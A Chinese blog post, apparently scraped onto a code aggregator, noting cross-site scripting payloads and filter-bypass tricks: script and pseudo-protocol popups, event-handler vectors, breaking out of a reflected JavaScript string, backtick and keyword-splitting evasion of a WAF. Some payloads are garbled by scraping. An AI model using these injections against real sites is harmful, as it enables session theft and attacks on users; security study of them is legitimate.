码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • xss过滤绕过笔记


    目录

    xss弹窗构造方式

    1、利用html中的<>

    2、伪协议

    3、html事件

    案例

    get请求中的变量返回到了响应体js的变量中

    过滤了圆括号()

    过滤了弹窗关键词


    xss弹窗构造方式

    常用方式如下

    1、利用html中的<>

    1. #alert
    2. <script>alert(String.fromCharCode(88,83,83))script>
    3. <script>alert(document.cookie)script>
    4. <script>alert(document.domain)script>
    5. #prompt
    6. <script>prompt(document.cookie)script>
    7. <script>prompt(document.domain)script>
    8. #confirm
    9. <script>confirm(document.cookie)script>
    10. <script>confirm(document.domain)script>

     

    2、伪协议

    "javascript:alert(/xss/)">touch me!   #点击超链接,即可触发XSS。

    3、html事件

    "事件驱动"是一种比较经典的编程思想。在网页中会发生很多事件(比如鼠标移动,键盘输入等),JS 可以对这些事件进行响应。所以我们可以通过事件触发JS 函数,触发XSS。

    1. #单击事件
    2. "button" onclick ="alert(/xss/)" value="点我! ">
    3. #双击事件
    4. #悬停
    5. #图片载入失败弹窗
    6. #按下键盘触发
    7. #点击提交就弹窗
    8. #svg是html5中新出的标签,也是一个事件
    9. #焦点 自动聚焦
    10. #鼠标自动聚焦到这个标签然后进行弹窗

    案例

    get请求中的变量返回到了响应体js的变量中

    如下get请求中的变量返回到了js的一个变量中,且变量用单引号包裹

    1. /pages/export.jsp?totalCount=32
    2. #返回包
    3. var totalCount = '32';

    知识点:js中 ; 和 - 都代表一个语句的结束

    1. 绕过

    将前面的单引号构造闭合并结束掉,再写弹窗的语句,再结束语句

    1. ?totalCount=32';confirm(1);'
    2. #或者
    3. ?totalCount=32'-confirm(1)-'
    4. #返回包
    5. var totalCount = '32';confirm(1);''; #第二个分号后面也要加引号与后面的语句构造闭合,因为js中引号也要成对出现,否则会报错运行不了

    过滤了圆括号()

    输入的圆括号会自动转为||

    怎么进行弹框呢?可以实用``尖括号代替,这里构造闭合,且``要进行url编码否则直接服务器报错

    过滤了弹窗关键词

    waf对了alert、confirm等关键词进行了拦截导致无法进行弹窗。可以用如下方式

    'javas'+'cript:ale'+'rt(`who?`)'>
  • 相关阅读:
    【接口技术】总线
    CoaXpress downlink数据解析方法
    PyTorch项目源码学习(3)——Module类初步学习
    从分段锁到 CAS:ConcurrentHashMap的进化之路
    Java入门-07-Java学习-JDK下载和安装
    cad图纸怎么转换成pdf格式
    【python初级】No module named ‘fcntl‘
    实现在Qt窗口中嵌套SDL
    nRF52832 SDK15.3.0 基于ble_app_uart demo FreeRTOS移植
    十五、Java中I/O流
  • 原文地址:https://blog.csdn.net/qq_44159028/article/details/126181011
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号